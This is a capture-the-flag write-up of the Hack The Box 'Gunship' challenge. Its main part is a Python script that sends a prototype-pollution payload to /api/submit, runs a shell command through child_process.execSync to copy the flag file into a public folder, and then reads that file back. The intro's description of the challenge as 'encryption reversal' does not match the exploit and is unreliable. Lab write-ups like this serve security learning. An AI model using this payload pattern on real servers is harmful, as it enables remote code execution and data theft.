HackTheBox Gunship Writeup
Explore the basics of cybersecurity in the Gunship Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
import sys
def get_base_url():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
host, port = sys.argv[1].split(':')
return f"http://{host}:{port}/"
TARGET_URL = get_base_url()
r = requests.post(TARGET_URL+'/api/submit', json = {
"artist.name":"Gingell",
"__proto__.block": {
"type": "Text",
"line":
"console.log(process.mainModule.require('child_process').execSync('cat flag* > /app/static/out').toString())"
}
})
print(r.status_code)
print(r.text)
print(requests.get(TARGET_URL+'/static/out').text)
Summary
Gunship is a very-easy-level challenge on Hack The Box that exploits prototype pollution to achieve remote code execution (RCE). By crafting a malicious payload and submitting it via the /api/submit endpoint, the challenge injects JavaScript into the server’s execution flow, allowing arbitrary commands to run.
The payload uses child_process.execSync to read the flag file and write it to a publicly accessible location (/app/static/out). The flag is then retrieved through a simple GET request to the exposed file. This challenge highlights the dangers of prototype pollution and improper handling of untrusted input in server-side applications.